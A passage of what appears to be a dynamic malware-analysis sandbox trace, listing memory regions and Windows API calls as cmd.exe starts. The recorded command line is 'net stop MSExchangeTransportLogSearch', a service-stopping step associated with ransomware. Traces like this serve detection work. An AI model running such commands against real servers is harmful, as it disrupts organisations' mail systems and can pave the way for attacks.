"c:\\windows\\system32\\ntdll.dll") Region: id = 12754 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12755 start_va = 0x4a60000 end_va = 0x4a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a60000" filename = "" Region: id = 12756 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12757 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12758 start_va = 0x4b20000 end_va = 0x4c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 12759 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12800 start_va = 0x47d0000 end_va = 0x47dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047d0000" filename = "" Region: id = 12801 start_va = 0x4990000 end_va = 0x4a4dfff entry_point = 0x4990000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12802 start_va = 0x4a70000 end_va = 0x4aaffff entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 12803 start_va = 0x4c20000 end_va = 0x4d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 12804 start_va = 0x4f00000 end_va = 0x4f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 12805 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12806 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12807 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12808 start_va = 0x7ef60000 end_va = 0x7f05ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef60000" filename = "" Region: id = 12809 start_va = 0x7f08a000 end_va = 0x7f08cfff entry_point = 0x0 region_type = private name = "private_0x000000007f08a000" filename = "" Region: id = 12810 start_va = 0x47e0000 end_va = 0x47e3fff entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 12811 start_va = 0x47f0000 end_va = 0x47f3fff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 12812 start_va = 0x4f10000 end_va = 0x5246fff entry_point = 0x4f10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 777 os_tid = 0x224 [0142.312] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0142.312] __set_app_type (_Type=0x1) [0142.312] __p__fmode () returned 0x77ac4d6c [0142.312] __p__commode () returned 0x77ac5b1c [0142.312] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0142.312] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0142.312] GetCurrentThreadId () returned 0x224 [0142.312] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x224) returned 0x84 [0142.312] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0142.312] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0142.312] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.314] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.315] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x495fa74 | out: phkResult=0x495fa74*=0x0) returned 0x2 [0142.315] VirtualQuery (in: lpAddress=0x495fa7b, lpBuffer=0x495fa2c, dwLength=0x1c | out: lpBuffer=0x495fa2c*(BaseAddress=0x495f000, AllocationBase=0x4860000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.315] VirtualQuery (in: lpAddress=0x4860000, lpBuffer=0x495fa2c, dwLength=0x1c | out: lpBuffer=0x495fa2c*(BaseAddress=0x4860000, AllocationBase=0x4860000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0142.315] VirtualQuery (in: lpAddress=0x4861000, lpBuffer=0x495fa2c, dwLength=0x1c | out: lpBuffer=0x495fa2c*(BaseAddress=0x4861000, AllocationBase=0x4860000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0142.315] VirtualQuery (in: lpAddress=0x4863000, lpBuffer=0x495fa2c, dwLength=0x1c | out: lpBuffer=0x495fa2c*(BaseAddress=0x4863000, AllocationBase=0x4860000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.315] VirtualQuery (in: lpAddress=0x4960000, lpBuffer=0x495fa2c, dwLength=0x1c | out: lpBuffer=0x495fa2c*(BaseAddress=0x4960000, AllocationBase=0x4960000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0142.315] GetConsoleOutputCP () returned 0x1b5 [0142.315] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0142.315] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0142.315] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.315] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0142.315] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.316] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0142.316] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.316] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0142.316] _get_osfhandle (_FileHandle=0) returned 0x38 [0142.316] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0142.316] _get_osfhandle (_FileHandle=0) returned 0x38 [0142.316] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0142.316] GetEnvironmentStringsW () returned 0x4b27d90* [0142.316] FreeEnvironmentStringsA (penv="A") returned 1 [0142.316] GetEnvironmentStringsW () returned 0x4b27d90* [0142.316] FreeEnvironmentStringsA (penv="A") returned 1 [0142.317] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x495e9d8 | out: phkResult=0x495e9d8*=0x94) returned 0x0 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x0, lpData=0x495e9e4*=0x14, lpcbData=0x495e9e0*=0x1000) returned 0x2 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x4, lpData=0x495e9e4*=0x1, lpcbData=0x495e9e0*=0x4) returned 0x0 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x0, lpData=0x495e9e4*=0x1, lpcbData=0x495e9e0*=0x1000) returned 0x2 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x4, lpData=0x495e9e4*=0x0, lpcbData=0x495e9e0*=0x4) returned 0x0 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x4, lpData=0x495e9e4*=0x40, lpcbData=0x495e9e0*=0x4) returned 0x0 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x4, lpData=0x495e9e4*=0x40, lpcbData=0x495e9e0*=0x4) returned 0x0 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x0, lpData=0x495e9e4*=0x40, lpcbData=0x495e9e0*=0x1000) returned 0x2 [0142.317] RegCloseKey (hKey=0x94) returned 0x0 [0142.317] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x495e9d8 | out: phkResult=0x495e9d8*=0x94) returned 0x0 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x0, lpData=0x495e9e4*=0x40, lpcbData=0x495e9e0*=0x1000) returned 0x2 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x4, lpData=0x495e9e4*=0x1, lpcbData=0x495e9e0*=0x4) returned 0x0 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x0, lpData=0x495e9e4*=0x1, lpcbData=0x495e9e0*=0x1000) returned 0x2 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x4, lpData=0x495e9e4*=0x0, lpcbData=0x495e9e0*=0x4) returned 0x0 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x4, lpData=0x495e9e4*=0x9, lpcbData=0x495e9e0*=0x4) returned 0x0 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x4, lpData=0x495e9e4*=0x9, lpcbData=0x495e9e0*=0x4) returned 0x0 [0142.317] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x495e9dc, lpData=0x495e9e4, lpcbData=0x495e9e0*=0x1000 | out: lpType=0x495e9dc*=0x0, lpData=0x495e9e4*=0x9, lpcbData=0x495e9e0*=0x1000) returned 0x2 [0142.317] RegCloseKey (hKey=0x94) returned 0x0 [0142.317] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983f [0142.317] srand (_Seed=0x5ad2983f) [0142.317] GetCommandLineW () returned="/c net stop MSExchangeTransportLogSearch" [0142.317] GetCommandLineW () returned="/c net stop MSExchangeTransportLogSearch" [0142.317] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0142.317] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b29ce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0142.317] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0142.317] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0142.317] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.318] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0142.318] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0142.318] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0142.318] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0142.318] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0142.318] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0142.318] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0142.318] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0142.318] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0142.318] GetEnvironmentStringsW () returned 0x4b27d90* [0142.318] FreeEnvironmentStringsA (penv="A") returned 1 [0142.318] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.318] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.318] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0142.318] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0142.318] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0142.318] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0142.318] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0142.318] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0142.318] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0142.318] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0142.318] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x495f7b0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0142.318] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x495f7b0, lpFilePart=0x495f7a8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x495f7a8*="Desktop") returned 0x1d [0142.318] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0142.318] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x495f530 | out: lpFindFileData=0x495f530) returned 0x4b205c8 [0142.319] FindClose (in: hFindFile=0x4b205c8 | out: hFindFile=0x4b205c8) returned 1 [0142.319] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x495f530 | out: lpFindFileData=0x495f530) returned 0x4b205c8 [0142.319] FindClose (in: hFindFile=0x4b205c8 | out: hFindFile=0x4b205c8) returned 1 [0142.319] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0142.319] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x495f530 | out: lpFindFileData=0x495f530) returned 0x4b205c8 [0142.319] FindClose (in: hFindFile=0x4b205c8 | out: hFindFile=0x4b205c8) returned 1 [0142.319] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0142.319] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0142.319] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0142.319] GetEnvironmentStringsW () returned 0x4b27d90* [0142.319] FreeEnvironmentStringsA (penv="=") returned 1 [0142.319] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0142.320] GetConsoleOutputCP () returned 0x1b5 [0142.320] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0142.320] GetUserDefaultLCID () returned 0x409 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x495f8e0, cchData=128 | out: lpLCData="0") returned 2 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x495f8e0, cchData=128 | out: lpLCData="0") returned 2 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x495f8e0, cchData=128 | out: lpLCData="1") returned 2 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0142.320] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0142.320] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0142.321] GetConsoleTitleW (in: lpConsoleTitle=0x4b2aa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.321] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0142.321] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0142.321] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0142.321] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0142.322] _wcsicmp (_String1="net", _String2=")") returned 69 [0142.322] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0142.322] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0142.322] _wcsicmp (_String1="IF", _String2="net") returned -5 [0142.322] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0142.322] _wcsicmp (_String1="REM", _String2="net") returned 4 [0142.322] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0142.323] GetConsoleTitleW (in: lpConsoleTitle=0x495f5c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.323] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0142.323] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0142.323] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0142.323] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0142.323] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0142.323] _wcsicmp (_String1="net", _String2="CD") returned 11 [0142.323] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0142.323] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0142.323] _wcsicmp (_String1="net", _String2="REN") returned -4 [0142.323] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0142.323] _wcsicmp (_String1="net", _String2="SET") returned -5 [0142.323] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0142.323] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0142.323] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0142.323] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0142.323] _wcsicmp (_String1="net", _String2="MD") returned 1 [0142.323] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0142.323] _wcsicmp (_String1="net", _String2="RD") returned -4 [0142.323] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0142.323] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0142.323] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0142.324] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0142.324] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0142.324] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0142.324] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0142.324] _wcsicmp (_String1="net", _String2="VER") returned -8 [0142.324] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0142.324] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0142.324] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0142.324] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0142.324] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0142.324] _wcsicmp (_String1="net", _String2="START") returned -5 [0142.324] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0142.324] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0142.324] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0142.324] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0142.324] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0142.324] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0142.324] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0142.324] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0142.324] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0142.324] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0142.324] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0142.324] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0142.324] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0142.324] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0142.324] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0142.324] _wcsicmp (_String1="net", _String2="CD") returned 11 [0142.324] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0142.324] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0142.324] _wcsicmp (_String1="net", _String2="REN") returned -4 [0142.324] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0142.324] _wcsicmp (_String1="net", _String2="SET") returned -5 [0142.324] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0142.324] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0142.324] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0142.324] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0142.324] _wcsicmp (_String1="net", _String2="MD") returned 1 [0142.324] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0142.324] _wcsicmp (_String1="net", _String2="RD") returned -4 [0142.324] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0142.324] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0142.324] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0142.324] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0142.324] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0142.324] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0142.324] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0142.324] _wcsicmp (_String1="net", _String2="VER") returned -8 [0142.324] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0142.324] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0142.324] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0142.324] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0142.324] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0142.324] _wcsicmp (_String1="net", _String2="START") returned -5 [0142.324] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0142.324] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0142.324] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0142.325] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0142.325] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0142.325] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0142.325] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0142.325] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0142.325] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0142.325] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0142.325] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0142.325] _wcsicmp (_String1="net", _String2="IF") returned 5 [0142.325] _wcsicmp (_String1="net", _String2="REM") returned -4 [0142.325] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0142.325] SetErrorMode (uMode=0x0) returned 0x0 [0142.325] SetErrorMode (uMode=0x1) returned 0x0 [0142.325] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4b205d0, lpFilePart=0x495f0d4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x495f0d4*="Desktop") returned 0x1d [0142.325] SetErrorMode (uMode=0x0) returned 0x1 [0142.325] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0142.325] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0142.333] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0142.333] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0142.333] GetConsoleTitleW (in: lpConsoleTitle=0x495f354, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.333] InitializeProcThreadAttributeList (in: lpAttributeList=0x495f280, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x495f264 | out: lpAttributeList=0x495f280, lpSize=0x495f264) returned 1 [0142.333] UpdateProcThreadAttribute (in: lpAttributeList=0x495f280, dwFlags=0x0, Attribute=0x60001, lpValue=0x495f26c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x495f280, lpPreviousValue=0x0) returned 1 [0142.333] GetStartupInfoW (in: lpStartupInfo=0x495f2b8 | out: lpStartupInfo=0x495f2b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, 